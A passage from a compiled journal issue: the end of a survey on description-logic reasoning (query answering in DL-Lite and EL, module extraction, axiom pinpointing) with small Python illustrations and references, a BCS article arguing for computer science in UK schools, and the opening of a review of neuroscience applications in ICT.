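                    f"WHERE {' AND '.join(where)}")
    return set(db.execute(" UNION ".join(sqls)).fetchall())

# q(x) = Man(x) ∧ child(x, y) ∧ Woman(y): JOHN is an answer via Father ⊑ Man etc.
print(rewrite_and_answer([("Man", "x"), ("Woman", "y")], [("child", "x", "y")], "x"))
```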
Interestingly, also in EL it is possible to implement query answering using a relational database system [LuToWo-IJCAI-09]. In contrast to the approach for DL-Lite, the TBox is incorporated into the ABox and not into the query. In addition, some limited query reformulation (independent of both the TBox and the ABox) is also required.
The relevance of the light-weight DLs discussed above is underlined by the fact that both of them are captured in the official W3C profiles7 document for OWL 2. Each of the OWL 2 profiles is designed for specific application requirements. For applications that rely on reasoning services for ontologies with a large number of concepts, the profile OWL 2 EL has been introduced, which is based on EL++, a tractable extension of EL. For applications that deal with large sets of data and that mainly use the reasoning service of query answering, the profile OWL 2 QL has been defined. The DL underlying this profile is a member of the DL-Lite family.
7 <http://www.w3.org/TR/owl2-profiles/>.
Novel inference problems
The developers of the early DL systems concentrated
on the subsumption and the instance problem, and the
same was true until recently for the developers of highly
optimized systems for expressive DLs. The development,
maintenance, and usage of large ontologies can, however, also profit from the use of other inference procedures. Certain non-standard inference problems, like
unification [BaNa00, BaMo09], matching [BKBM99,
BaKu00], and the problem of computing least common
subsumers [BaKu98, BaKM99, BaST07, DCNS09] have
been investigated for quite a while [BaKu06]. Unification and matching can, for example, help the ontology
engineer to find redundancies in large ontologies, and
least common subsumers and most specific concepts can
be used to generate concepts from examples.
Other non-standard inference problems have, however, come into the focus of mainstream DL research only
recently. One example is conjunctive query answering,
which is not only investigated for light-weight DLs (see
above), but also for expressive DLs [GHLS07, Lutz08].
Another is the identification and extraction of modules inside an ontology. Intuitively, given an ontology and a signature (i.e., a subset of the concept and role names occurring in the ontology), a module is a subset of the ontology such that the following holds for all concept descriptions C, D that can be built from symbols in the signature: C is subsumed by D w.r.t. the module if C is subsumed by D w.r.t. the whole ontology. Consequently, if one is only interested in subsumption between concepts built from symbols in the signature, it is sufficient to use the module instead of the (possibly much larger) whole ontology. Similarly, one can also introduce the notion of a module for other inference problems (such as query answering). An overview over different approaches for defining modules and a guideline for when to use which notion of a module can be found in [SaSZ09]. Module identification and extraction is computationally costly for expressive DLs, and even undecidable for very expressive ones such as OWL DL [LuWW07]. Both for the EL family [LuWo07, Sunt08] and the DL-Lite family [KWZ-KR-08], the reasoning problems that are relevant in this area are decidable and usually of much lower complexity than for expressive DLs.
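To illustrate why module extraction is so much easier for light-weight DLs, here is a simplified sketch in the spirit of the reachability-based approach that [Sunt08] proposes for normalized EL+ TBoxes: an axiom is pulled into the module as soon as every symbol on its left-hand side is reachable from the signature. The axiom encoding and the toy TBox are our own, and the precise definition in the paper may differ.

```python
# Axioms are normalized GCIs represented as (lhs_symbols, rhs_symbols),
# e.g. Man ⊑ ∃child.Human becomes ({'Man'}, {'child', 'Human'}).

def reachability_module(tbox, signature):
    """Return the axioms whose left-hand side only uses signature-reachable symbols."""
    reachable = set(signature)
    module = set()
    changed = True
    while changed:
        changed = False
        for i, (lhs, rhs) in enumerate(tbox):
            if i not in module and lhs <= reachable:
                module.add(i)
                reachable |= rhs          # symbols on the right-hand side become reachable
                changed = True
    return [tbox[i] for i in sorted(module)]

# Toy TBox: Father ⊑ Man, Man ⊑ Human, Man ⊑ ∃child.Human, Doctor ⊑ Human
tbox = [
    ({"Father"}, {"Man"}),
    ({"Man"}, {"Human"}),
    ({"Man"}, {"child", "Human"}),
    ({"Doctor"}, {"Human"}),
]
# For the signature {Father}, the Doctor axiom is irrelevant and is left out.
print(reachability_module(tbox, {"Father"}))
```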
For a developer or user of a DL-based ontology, it is
often quite hard to understand why a certain consequence
computed by the reasoner actually follows from the
knowledge base. For example, in the DL version of the
medical ontology SNOMED CT, the concept Amputation-of-Finger is classified as a subconcept of Amputation-of-Arm. Finding the six axioms that are responsible for
this error [BaSu08] among the more than 350,000 con-
cept definitions of SNOMED CT without support by an
automated reasoning tool is not easy. Axiom pinpointing
[ScCo03] has been introduced to help developers or users of DL-based ontologies understand the reasons why
a certain consequence holds by computing minimal subsets of the knowledge base that have the consequence in
question (called MinAs or Explanations). There are two
general approaches for computing MinAs: the black-box
approach and the glass-box approach. The most naïve
variant of the black-box approach considers all subsets
of the ontology, and computes for each of them whether
it still has the consequence or not. More sophisticated
versions [KPHS07] use a variant of Reiter’s [Reit87] hitting set tree algorithm to compute all MinAs. Instead of
applying such a black-box approach to a large ontology,
one can also first try to find a small and easy to compute
subset of the ontology that contains all MinAs, and then
apply the black-box approach to this subset [BaSu08].
The main advantage of the black-box approach is that it
can use existing highly-optimized DL reasoners unchanged. However, it may be necessary to call the
reasoner an exponential number of times. In contrast, the
glass-box approach tries to find all MinAs by a single
run of a modified reasoner.
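To make the black-box idea more tangible, the following minimal sketch computes a single MinA with the naive "try to remove each axiom" strategy; computing all MinAs would additionally require something like the hitting-set tree method of [KPHS07] mentioned above. The entails function is only a stand-in for a call to an (unmodified) DL reasoner, and the toy axioms are our own.

```python
def one_minimal_explanation(axioms, entails, consequence):
    """Shrink `axioms` to a minimal subset that still entails `consequence`."""
    assert entails(axioms, consequence), "the whole ontology must have the consequence"
    kept = list(axioms)
    for axiom in list(axioms):
        trial = [a for a in kept if a != axiom]
        if entails(trial, consequence):    # axiom not needed: drop it for good
            kept = trial
    return kept                            # removing any remaining axiom breaks the entailment

# Toy "reasoner": axioms are pairs (A, B) meaning A ⊑ B, and entailment is
# reachability in the induced graph (sufficient for this illustration only).
def entails(axioms, goal):
    sub, sup = goal
    reached, frontier = {sub}, {sub}
    while frontier:
        frontier = {b for (a, b) in axioms if a in frontier} - reached
        reached |= frontier
    return sup in reached

axioms = [("Father", "Man"), ("Man", "Human"), ("Father", "Human"), ("Doctor", "Human")]
print(one_minimal_explanation(axioms, entails, ("Father", "Human")))
```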
Most of the glass-box pinpointing algorithms described in the DL literature (e.g., [ScCo03, PaSK05,
LeMP06]) are obtained as extensions of tableau-based
reasoning algorithms [BaSa01] for computing consequences from DL knowledge bases. To overcome the
problem of having to design a new pinpointing extension for every tableau-based algorithm, the papers
[BaPe07, BaPe09] introduce a general approach for extending tableau-based algorithms to pinpointing algorithms. This approach is based on a general notion of
"tableau algorithm," which captures many of the known
tableau-based algorithms for DLs and Modal Logics, but
also other kinds of decision procedures, like the polynomial-time subsumption algorithm for the DL EL sketched above. Any such tableau algorithm can be extended to a pinpointing algorithm, which is correct in
the sense that a terminating run of the algorithm computes all MinAs. Unfortunately, however, termination
need not transfer from a given tableau to its pinpointing
extension, and the approach only applies to tableau-based
algorithms that terminate without requiring any cycle-checking mechanism (usually called "blocking" in the
DL community). Though these problems can, in principle, be solved by restricting the general framework to
so-called forest tableaux [BaPe09], this solution makes
the definitions and proofs more complicated and less intuitive.
In [BaPe08], a different general approach for obtaining glass-box pinpointing algorithms is introduced, which also applies to DLs for which the termination of tableau-based algorithms requires the use of blocking. It is well-known that automata working on infinite trees can often be used to construct worst-case optimal decision procedures for such DLs [BaTo01, CaGL02]. In this automata-based approach, the input inference problem is translated into a tree automaton, which is then tested for emptiness. Basically, pinpointing is then realized by transforming the tree automaton into a weighted tree automaton working on infinite trees, and computing the so-called behavior of this weighted automaton.
3 Conclusion
The DL research of the last 30 years has led, on the
one hand, to highly expressive ontology languages, which
can nevertheless be supported by practical reasoning
tools. On the other hand, the recent development of lightweight DLs and specialized reasoning tools for them ensures that DL reasoning scales to large ontologies with
hundreds of thousands of terminological axioms (like
SNOMED CT) and, by using database technology, to
much larger sets of instance data. In addition, novel inference methods such as modularization and pinpointing
support building and maintaining high-quality ontologies.
References
[AbHV95] Serge Abiteboul, Richard Hull, and
Victor Vianu. Foundations of
Databases. Addison Wesley Publ.
Co., Reading, Massachusetts,
1995.
[Baad90c] Franz Baader. Terminological cycles in KL-ONE-based knowledge
representation languages. In Proc.
of the 8th Nat. Conf. on Artificial
Intelligence (AAAI’90), pages
621-626, Boston (Ma, USA), 1990.
[BaBL05] Franz Baader, Sebastian Brandt,
and Carsten Lutz. Pushing the EL
envelope. In Leslie Pack Kaelbling
and Alessandro Saffiotti, editors,
Proc. of the 19th Int. Joint Conf.
on Artificial Intelligence (IJCAI
2005), pages 364-369, Edinburgh
(UK), 2005. Morgan Kaufmann,
Los Altos.
[BaBL08] Franz Baader, Sebastian Brandt,
and Carsten Lutz. Pushing the EL
envelope further. In Kendall Clark
and Peter F. Patel-Schneider, editors, In Proceedings of the Fifth International Workshop on OWL:
Experiences and Directions
(OWLED’08), Karlsruhe, Germany, 2008.
[BCNMP03] Franz Baader, Diego Calvanese,
Deborah McGuinness, Daniele
Nardi, and Peter F. Patel-Schneider, editors. The Description Logic
Handbook: Theory, Implementation, and Applications. Cambridge
University Press, 2003.
[BFHN*94]
Franz Baader, Enrico
Franconi, Bernhard Hollunder,
Bernhard Nebel, and Hans-Jürgen
Profitlich. An empirical analysis of
optimization techniques for terminological representation systems
or: Making KRIS get a move on.
Applied Artificial Intelligence.
Special Issue on Knowledge Based
Management, 4:109-132, 1994.
[BaKu98] Franz Baader and Ralf Küsters.
Computing the least common
subsumer and the most specific
concept in the presence of cyclic
ALN-concept descriptions. In
Proc. of the 22nd German Annual
Conf. on Artificial Intelligence
(KI’98), volume 1504 of Lecture
Notes in Computer Science, pages
129-140. Springer-Verlag, 1998.
[BaKu00] Franz Baader and Ralf Küsters.
Matching in description logics with
existential restrictions. In Proc. of
the 7th Int. Conf. on Principles of
Knowledge Representation and
Reasoning (KR 2000), pages 261-272, 2000.
[BaKu06] Franz Baader and Ralf Küsters.
Nonstandard inferences in description logics: The story so far. In
D.M. Gabbay, S.S. Goncharov, and
M. Zakharyaschev, editors, Mathematical Problems from Applied
Logic I, volume 4 of International
Mathematical Series, pages 1-75.
Springer-Verlag, 2006.
[BKBM99]
Franz Baader, Ralf Küsters,
Alex Borgida, and Deborah L.
McGuinness. Matching in description logics. J. of Logic and Computation, 9(3):411-447, 1999.
[BaKM99]Franz Baader, Ralf Küsters, and
Ralf Molitor. Computing least
common subsumers in description
logics with existential restrictions.
In Proc. of the 16th Int. Joint Conf.
on Artificial Intelligence
(IJCAI’99), pages 96-101, 1999.
[BaLS05] Franz Baader, Carsten Lutz, and
Boontawee Suntisrivaraporn. Is
tractable reasoning in extensions of
the description logic EL useful in
practice? In Proceedings of the
2005 International Workshop on
Methods for Modalities (M4M05), 2005.
[BaMo09] Franz Baader and Barbara
Morawska. Unification in the description logic EL. In Ralf Treinen,
editor, Proc. of the 20th Int. Conf.
on Rewriting Techniques and Applications (RTA 2009), volume
5595 of Lecture Notes in Computer Science, pages 350-364.
Springer-Verlag, 2009.
[BaNa00] Franz Baader and Paliath
Narendran. Unification of concept terms in description logics. J. of
Symbolic
Computation,
31(3):277-305, 2001.
[BaPe07] Franz Baader and Rafael Peñaloza.
Axiom pinpointing in general tableaux. In Proc. of the Int. Conf. on
Analytic Tableaux and Related
Methods (TABLEAUX 2007),
volume 4548 of Lecture Notes in
Artificial Intelligence, pages 11-27.
Springer-Verlag, 2007.
[BaPe08] Franz Baader and Rafael Peñaloza.
Automata-based axiom pinpointing. In Alessandro Armando, Peter
Baumgartner, and Gilles Dowek,
editors, Proc. of the Int. Joint Conf.
on Automated Reasoning (IJCAR
2008), volume 5195 of Lecture
Notes in Artificial Intelligence,
pages 226-241. Springer-Verlag,
2008.
[BaPe09] Franz Baader and Rafael Peñaloza.
Axiom pinpointing in general tableaux. Journal of Logic and Com-
putation, 2009. To appear.
[BaSa01] Franz Baader and Ulrike Sattler. An
overview of tableau algorithms for
description logics. Studia Logica,
69:5-40, 2001.
[BaST07] Franz Baader, Baris Sertkaya, and
Anni-Yasmin Turhan. Computing
the least common subsumer w.r.t.
a background terminology. J. of
Applied Logic, 5(3):392-420,
2007.
[BaSu08] Franz Baader and Boontawee
Suntisrivaraporn. Debugging
SNOMED CT using axiom pinpointing in the description logic
EL+. In Proceedings of the International Conference on Representing and Sharing Knowledge Using
SNOMED (KR-MED’08), Phoenix, Arizona, 2008.
[BaTo01] Franz Baader and Stephan Tobies.
The inverse method implements
the automata approach for modal
satisfiability. In Proc. of the Int.
Joint Conf. on Automated Reasoning (IJCAR 2001), volume 2083 of
Lecture Notes in Artificial Intelligence, pages 92-106. SpringerVerlag, 2001.
[BrLe85] Ronald J. Brachman and Hector J.
Levesque, editors. Readings in
Knowledge Representation.
Morgan Kaufmann, Los Altos,
1985.
[BrSc85] Ronald J. Brachman and James G.
Schmolze. An overview of the KL-ONE knowledge representation
system. Cognitive Science,
9(2):171-216, 1985.
[Bran04] Sebastian Brandt. Polynomial time
reasoning in a description logic
with existential restrictions, GCI
axioms, and what else? In Ramon
López de Mántaras and Lorenza
Saitta, editors, Proc. of the 16th
Eur. Conf. on Artificial Intelligence
(ECAI 2004), pages 298-302,
2004.
[CGL+05] Diego Calvanese, Giuseppe De
Giacomo, Domenico Lembo,
Maurizio Lenzerini, and Riccardo
Rosati. DL-Lite: Tractable description logics for ontologies. In
Manuela M. Veloso and Subbarao
Kambhampati, editors, Proc. of the
20th Nat. Conf. on Artificial Intelligence (AAAI 2005), pages 602-607. AAAI Press/The MIT Press,
2005.
[CDL+-KR06] Diego Calvanese, Giuseppe de
Giacomo, Domenico Lembo,
Maurizio Lenzerini, and Riccardo
Rosati. Data complexity of query
answering in description logics. In
Patrick Doherty, John Mylopoulos,
and Christopher A. Welty, editors,
Proc. of the 10th Int. Conf. on Principles of Knowledge Representation and Reasoning (KR 2006),
pages 260-270. AAAI Press/The
MIT Press, 2006.
[CGL+07] Diego Calvanese, Giuseppe De
Giacomo, Domenico Lembo,
Maurizio Lenzerini, and Riccardo
Rosati. Tractable reasoning and efficient query answering in description logics: The DL-Lite family. J.
of Automated Reasoning,
39(3):385-429, 2007.
[CaGL02] Diego Calvanese, Giuseppe
DeGiacomo, and Maurizio
Lenzerini. 2ATAs make DLs easy.
In Proc. of the 2002 Description
Logic Workshop (DL 2002), pages
107-118. CEUR Electronic Workshop Proceedings, http://ceurws.org/Vol-53/, 2002.
[DCNS09] Francesco M. Donini, Simona
Colucci, Tommaso Di Noia, and
Eugenio Di Sciascio. A tableauxbased method for computing least
common subsumers for expressive
description logics. In Craig
Boutilier, editor, Proc. of the 21st
Int. Joint Conf. on Artificial Intelligence (IJCAI 2009), pages 739-745, 2009.
[Fitt72] Melvin Fitting. Tableau methods of
proof for modal logics. Notre
Dame J. of Formal Logic,
13(2):237-247, 1972.
[GHLS07] Birte Glimm, Ian Horrocks,
Carsten Lutz, and Ulrike Sattler.
Conjunctive query answering for
the description logic SHIQ. In
Manuela M. Veloso, editor, Proc.
Of the 20th Int. Joint Conf. on Artificial Intelligence (IJCAI 2007),
pages 399-404, Hyderabad, India,
2007.
[HaMo01b]
Volker Haarslev and Ralf
Möller. RACER system description. In Proc. of the Int. Joint Conf.
on Automated Reasoning (IJCAR
2001), volume 2083 of Lecture
Notes in Artificial Intelligence,
pages 701-706. Springer-Verlag,
2001.
[HaMo08] Volker Haarslev and Ralf Möller.
On the scalability of description
logic instance retrieval. J. of Automated Reasoning, 41(2):99-142,
2008.
[Haye79] Patrick J. Hayes. The logic of
frames. In D.Metzing, editor,
Frame Conceptions and Text Understanding, pages 46-61. Walter
de Gruyter and Co., 1979. Repub-
lished in [BrLe85].
[Horr03] Ian Horrocks. Implementation and
optimization techniques. In
[BCNMP03], pages 306-346.
2003.
[HoKS06] Ian Horrocks, Oliver Kutz, and
Ulrike Sattler. The even more irresistible SROIQ. In Patrick Doherty,
John Mylopoulos, and Christopher
A. Welty, editors, Proc. of the 10th
Int. Conf. on Principles of Knowledge Representation and Reasoning (KR 2006), pages 57-67, Lake
District, UK, 2006. AAAI Press/
The MIT Press.
[HoPa04] Ian Horrocks and Peter F. PatelSchneider. Reducing OWL entailment to description logic
satisfiability. J. Web Sem.,
1(4):345-357, 2004.
[HoPH03] Ian Horrocks, Peter F. Patel-Schneider, and Frank van Harmelen.
From SHIQ and RDF to OWL: The
making of a web ontology language. Journal of Web Semantics,
1(1):7-26, 2003.
[HoSa05] Ian Horrocks and Ulrike Sattler. A
tableaux decision procedure for
SHOIQ. In Proc. of the 19th Int.
Joint Conf. on Artificial Intelligence (IJCAI 2005), Edinburgh
(UK), 2005. Morgan Kaufmann,
Los Altos.
[KPHS07] Aditya Kalyanpur, Bijan Parsia,
Matthew Horridge, and Evren
Sirin. Finding all justifications of
OWL DL entailments. In Proceedings of the 6th International Semantic Web Conference and 2nd
Asian Semantic Web Conference,
ISWC 2007 + ASWC 2007, volume 4825 of Lecture Notes in
Computer Science, pages 267-280,
Busan, Korea, 2007. SpringerVerlag.
[Kaza08] Yevgeny Kazakov. RIQ and
SROIQ are harder than SHOIQ. In
Gerhard Brewka and Jérôme Lang,
editors, Proc. of the 11th Int. Conf.
on Principles of Knowledge Representation and Reasoning (KR
2008), pages 274-284. AAAI
Press, 2008.
[KWZ-KR-08] Roman Kontchakov, Frank
Wolter,
and
Michael
Zakharyaschev. Can you tell the
difference between DL-Lite
ontologies? In Gerhard Brewka
and Jérôme Lang, editors, Proc. of
the 11th Int. Conf. on Principles of
Knowledge Representation and
Reasoning (KR 2008), pages 285-295. Morgan Kaufmann, Los Altos, 2008.
[LeMP06] Kevin Lee, Thomas Meyer, and
Jeff Z. Pan. Computing maximally
satisfiable terminologies for the description logic ALC with GCIs. In
Proc. of the 2006 Description
Logic Workshop (DL 2006), volume 189 of CEUR Electronic
Workshop Proceedings, 2006.
[LeBr87] Hector J. Levesque and Ron J.
Brachman. Expressiveness and
tractability in knowledge representation and reasoning. Computational Intelligence, 3:78-93, 1987.
[Lutz08] Carsten Lutz. The complexity of
conjunctive query answering in expressive description logics. In
Alessandro Armando, Peter
Baumgartner, and Gilles Dowek,
editors, Proc. of the Int. Joint Conf.
on Automated Reasoning (IJCAR
2008), Lecture Notes in Artificial
Intelligence, pages 179-193.
Springer-Verlag, 2008.
[LuMi07] Carsten Lutz and Maja Milicic. A
tableau algorithm for description
logics with concrete domains and
general tboxes. J. of Automated
Reasoning, 38(1-3):227-259,
2007.
[LuToWo-IJCAI-09] Carsten Lutz, David
Toman, and Frank Wolter. Conjunctive query answering in the description logic EL using a relational
database system. In Proceedings of
the 21st International Joint Conference on Artificial Intelligence
IJCAI09. AAAI Press, 2009. To
appear.
[LuWW07]
Carsten Lutz, Dirk Walther,
and Frank Wolter. Conservative extensions in expressive description
logics. In Manuela M. Veloso, editor, Proc. of the 20th Int. Joint Conf.
on Artificial Intelligence (IJCAI
2007), pages 453-458, Hyderabad,
India, 2007.
[LuWo07] Carsten Lutz and Frank Wolter.
Conservative extensions in the
lightweight description logic EL. In
Frank Pfenning, editor, Proc. of the
21st Int. Conf. on Automated Deduction (CADE 2007), volume
4603 of Lecture Notes in Computer Science, pages 84-99, Bremen,
Germany, 2007. Springer-Verlag.
[MaDW91]
E. Mays, R. Dionne, and R.
Weida. K-REP system overview.
SIGART Bull., 2(3), 1991.
[Mins81] Marvin Minsky. A framework for
representing knowledge. In John
Haugeland, editor, Mind Design.
The MIT Press, 1981. A longer version appeared in The Psychology
of Computer Vision (1975). Re-
published in [BrLe85].
[Nebe88] Bernhard Nebel. Computational
complexity of terminological reasoning in BACK. Artificial Intelligence, 34(3):371-383, 1988.
[Nebe90] Bernhard Nebel. Terminological
reasoning is inherently intractable.
Artificial Intelligence, 43:235-249,
1990.
[OrCE08] Magdalena Ortiz, Diego Calvanese, and Thomas Eiter. Data
complexity of query answering in
expressive description logics via
tableaux. J. of Automated Reasoning, 41(1):61-98, 2008.
[PaSK05] Bijan Parsia, Evren Sirin, and
Aditya Kalyanpur. Debugging
OWL ontologies. In Allan Ellis and
Tatsuya Hagino, editors, Proc. of
the 14th International Conference
on World Wide Web (WWW’05),
pages 633-640. ACM, 2005.
[Pate84] Peter F. Patel-Schneider. Small can
be beautiful in knowledge representation. In Proc. of the IEEE
Workshop on Knowledge-Based
Systems, 1984. An extended version appeared as Fairchild Tech.
Rep. 660 and FLAIR Tech. Rep.
37, October 1984.
[Pelt91] Christof Peltason. The BACK system: an overview. SIGART Bull.,
2(3):114-119, 1991.
[Quil67] M. Ross Quillian. Word concepts:
A theory and simulation of some
basic capabilities. Behavioral Science, 12:410-430, 1967. Republished in [BrLe85].
[Reit87] R. Reiter. A theory of diagnosis
from first principles. Artificial Intelligence, 32(1):57-95, 1987.
[SaSZ09] Ulrike Sattler, Thomas Schneider,
and Michael Zakharyaschev.
Which kind of module should I extract? In Proc. of the 2008 Description Logic Workshop (DL 2009),
volume 477 of CEUR Workshop
Proceedings, 2009.
[ScCo03] Stefan Schlobach and Ronald Cornet. Non-standard reasoning services for the debugging of description logic terminologies. In Georg
Gottlob and Toby Walsh, editors,
Proc. of the 18th Int. Joint Conf.
on Artificial Intelligence (IJCAI
2003), pages 355-362, Acapulco,
Mexico, 2003. Morgan Kaufmann,
Los Altos.
[Schm89] Manfred
Schmidt-Schauß.
Subsumption in KL-ONE is undecidable. In Ron J. Brachman, Hector J. Levesque, and Ray Reiter,
editors, Proc. of the 1st Int. Conf.
on the Principles of Knowledge
Representation and Reasoning (KR'89), pages 421-431. Morgan Kaufmann, Los Altos, 1989.
[ScSm91] Manfred Schmidt-Schauß and Gert Smolka. Attributive concept descriptions with complements. Artificial Intelligence, 48(1):1-26, 1991.
[ScGC79] Len K. Schubert, Randy G. Goebel, and Nicola J. Cercone. The structure and organization of a semantic net for comprehension and inference. In N. V. Findler, editor, Associative Networks: Representation and Use of Knowledge by Computers, pages 121-175. Academic Press, 1979.
[SiPa04] Evren Sirin and Bijan Parsia. Pellet: An OWL DL reasoner. In Proc. of the 2004 Description Logic Workshop (DL 2004), pages 212-213, 2004.
[Sunt08] Boontawee Suntisrivaraporn. Module extraction and incremental classification: A pragmatic approach for EL+ ontologies. In Sean Bechhofer, Manfred Hauswirth, Joerg Hoffmann, and Manolis Koubarakis, editors, Proceedings of the 5th European Semantic Web Conference (ESWC'08), volume 5021 of Lecture Notes in Computer Science, pages 230-244. Springer-Verlag, 2008.
[Meng09] Boontawee Suntisrivaraporn. Polynomial-Time Reasoning Support for Design and Maintenance of Large-Scale Biomedical Ontologies. PhD thesis, Fakultät Informatik, TU Dresden, 2009. <http://lat.inf.tu-dresden.de/research/phd/#Sun-PhD-2008>.
[TSHo06] Dmitry Tsarkov and Ian Horrocks. FaCT++ description logic reasoner: System description. In Ulrich Furbach and Natarajan Shankar, editors, Proc. of the Int. Joint Conf. on Automated Reasoning (IJCAR 2006), volume 4130 of Lecture Notes in Artificial Intelligence, pages 292-297. Springer-Verlag, 2006.
Computer Science
The Future of Computer Science in Schools
Brian Runciman
© 2011 The British Computer Society
This paper was first published by ITNOW (Volume 53, num. 6, Winter 2011, pp. 10-11). ITNOW, a UPENET partner, is the
member magazine for the British Computer Society (BCS), a CEPIS member. It is published, in English, by Oxford University Press
on behalf of the BCS, <http://www.bcs.org/>. The Winter 2011 issue of ITNOW can be accessed at <http://itnow.oxfordjournals.org/
content/53/6.toc>. © Informatica, 2011
We all know that digital literacy is vital in the modern world, but are we making sure our next generation of researchers and academics, the innovators that will produce the UK’s valuable digital intellectual property of the future, are being
looked after too?
Keywords: Computer Science,
Digital Literacy, Schools.
With so many organisations depending on computing, computer science itself should be viewed as a fundamental discipline like Maths and
English. Engineering- and science-based industries require computers to
simulate, calculate, emulate, model and
more, yet there is a shortage in the UK
of people with the requisite abilities to
run these systems. And the problem
begins in school.
The Next Gen report shows that 40
per cent of teachers conflate ICT with
computing, not appreciating that ICT
is learning to use applications but computing is learning how to make them.
This is a fundamental difference that
can be compared to that between reading and writing.
Children certainly need to learn
about digital literacy and BCS already
addresses some of these issues with
qualifications like Digital Creator,
ECDL, Digital Skills, eType and the
like. But teaching computing as a discipline in schools will allow children
to express creativity.
Disciplines learnt in even older
computing courses apply because these
are based on principles. It’s the skills
area, such as specific programming
languages, that change. Of course,
practical work is still needed to pick up
practical techniques, but an understanding of the discipline can take children right through from primary school
to a university computer science
course.
What about the teachers and
the schools?
Unfortunately teaching computing
seems to have gone backwards in
schools. In the 1980s children using
BBC Micros had the opportunity to
learn programming and wanted to create something using digital building
blocks. But at a certain point that disappeared and schools took to teaching
ICT – how to use word processors,
spreadsheets and the like. Whilst these
skills are useful you can’t forge a career in a creative industry with them.
The qualification network has been
set up in such a way that the main motivation for schools is to climb the
league tables, so they go for ICT
Author
Brian Runciman MBCS has been at
BCS (British Computer Society, United
Kingdom) since 2001, starting out as a
writer, moving onto being Managing
Editor and now acting as Publisher for
editorial content. He tweets via
@BrianRunciman. <brian.runciman@
hq.bcs.org.uk>
qualifications that are based around using
software. The teachers available have
often done a great job teaching ICT,
but there aren’t enough of them. So
those two things together have actually lowered standards and don’t create the environment where head teachers want to teach computer science-related syllabuses.
This means fighting the ethos of
many head teachers that they go for a
qualification because they can get a
very high pass rate in it rather than
getting children involved in a more
demanding qualification that would
lead to our next generation of innovators.
This also affects the motivation of
the teachers who could teach computer science-related areas, because ICT
teaching has been seen as something
that can be done by anyone who has
those basic IT skills.
Strange approaches
Strangely, the new English Baccalaureate doesn’t have computer science, or even ICT, included in it. Even
art isn’t included, so this could have
knock-on effects in, for example,
games development, which is a coming together of art and technology.
A way of thinking of this is seeing
the teaching of computing as three-layered: firstly the basic digital literacy,
which most people come out of the
womb with now; then the next level of
the intelligent user, perhaps in architecture or the like; then there is the top
layer: those who are specialists in computing and are creating new technologies and applications. These ones keep
us at the forefront of the creative
economy.
An interesting example of skewed
viewpoints was demonstrated recently
when Michael Gove spoke of Mark
Zuckerberg, surely an excellent computer science role model as founder of
Facebook, as having studied Latin in
school. Gove didn’t mention that he
had also studied computer science,
surely much more relevant. This shows
the traditional emphasis on the classics,
but computer science should also be
part of the curriculum.
"For me computer science is the
new Latin", said Ian Livingstone at this
point in the discussion.
Another example of the difficulties
faced in changing approaches is shown
in games development as promoted by
universities. There are 144 games
courses at universities, but only 10 of
those have been approved as fit for purpose by Skillset. Most are really updated versions of media studies, showing context and impact, but not teaching how to create games.
The codes used by universities to
grade courses are also viewed as not
really doing the job. The universities
could help more by labeling courses
more accurately.
How do we get young people excited about computer science in
schools?
A drawback of the current curriculum is that a child could be taught
the use of Excel spreadsheets three
times over their time at school, when
most could probably master it in a
week. It’s no wonder many of them
find ICT so boring.
Parents, guardians and teachers
need to be aware of the opportunities
computer science can offer. What IT
can do in the creative areas is exciting
for children. For children in secondary education seeing the application of
computer science in, for example, robotics, such as Lego Mindstorms, can
show them that through a computer
you can build and animate an entire
world.
If they see the creative potential
while they are young they will stay
engaged later.
There are also exciting possibilities
in the games industry – despite the bad
press, 97 per cent of what is produced
is family friendly – and very innovative. It’s true in the financial industry
too, which uses advanced modeling
techniques. Many physics PhDs wind up in the City of London doing computer science activities. Computer
modeling in engineering is vibrant;
pharmaceutical companies are dependent on modeling too. There are huge
opportunities for those with programming talent.
We could also make better use of
role models. If you stopped the average child in the street they would be
hard pushed to name an IT role model.
Possibly they would think of Sir Tim
Berners-Lee, but we need to champion
these more too.
What progress is being made
and what can be done?
"This is where BCS and the Computing at Schools group have a very
important role, because they can bring
together the academic community,
grow it and help others get involved,"
commented Andrew Herbert.
This needs to include a partnership
between the universities and schools.
Until recently the government was
happy that there were plenty of ICT
qualifications and a curriculum in
place, but with the national curriculum
review, it seems that the DFE now recognise not only the importance of digital literacy, but the core academic discipline of computing.
The UK needs to take this seriously
when in China there are a million
graduates with computer science, engineering and software engineering
degrees. Some of the best intellectual
property in technology is coming out
of Israel, where computer science is
taught in schools nationally.
Industry can help too, perhaps encouraging the young to program on
new mobile platforms through competitions and the like. This is being done,
but more is always helpful.
What next?
The panel agreed that computer
science should be an option in the science part of STEM and that education
needs to be reformed in schools and
universities. Computer science needs
to be seen as an essential discipline and
on the school curriculum from early
stages.
Bill Mitchell concluded: "Every
child should be experiencing computing throughout their school life, starting at primary school, through to age
16, even 18."
Note: This article is based on a
video round table discussion produced
by BCS, The Chartered Institute for IT,
on behalf of the BCS Academy of
Computing. It was attended by BCS
Academy of Computing Director Bill
Mitchell; Andrew Herbert, former
Chairman of Microsoft Research Europe and a key player in setting up the
Computing at Schools Working Group;
and Ian Livingstone of EIDOS, coauthor of the recent NESTA report, ‘Next
gen’. Brian Runciman MBCS chaired.
The full video is at <http://www.
bcs.org/video>.
The NESTA report is at <http://
www.nesta.org.uk/publications/assets/
features/next_gen>.
IT for Health
Neuroscience and ICT: Current and Future Scenarios
Gianluca Zaffiro and Fabio Babiloni
© Mondo Digitale, 2011
This paper was first published, in its original Italian version, under the title "Neuroscienze e ICT: Una Panoramica", by Mondo
Digitale (issue no. 2-3, June-September 2011, pp. 5-14, available at <http://www.mondodigitale.net/>). Mondo Digitale, a founding
member of UPENET, is the digital journal of the CEPIS Italian society AICA (Associazione Italiana per l’Informatica ed il Calcolo
Automatico, <http://www.aicanet.it/>.)
In the last couple of decades the study of the human brain has made great advancements thanks to powerful neuroimaging
devices such as the high resolution electroencephalography (hrEEG) or the functional magnetic resonance imaging (fMRI).
Such advancements have increased our understanding of basic cerebral mechanisms related to memory and sensory
processes. Recently, neuroscience results have attracted the attention of several researchers from the Information and
Communication Technologies (ICT) domain in order to generate new devices and services for disabled as well as normal
people. This paper reviews briefly the applications of Neuroscience in the ICT domain, based on the research actually
funded by the European Union in this field.
1 New Brain Imaging Tools allow the Study of the Cerebral Activity in vivo in Human Beings
In the history of science the development of new analysis tools has often allowed the exploration of new scientific horizons and the overcoming of
old boundaries of knowledge. In the
last 20 years the scientific research has
generated a set of powerful tools to
measure and analyze the cerebral activity in human beings in a completely
"non-invasive" way. It means that they
could be employed to gather data in
awake subjects causing no harm to
their skin. Such tools provide images
of the brain cerebral activity of the subject while s/he is performing a given
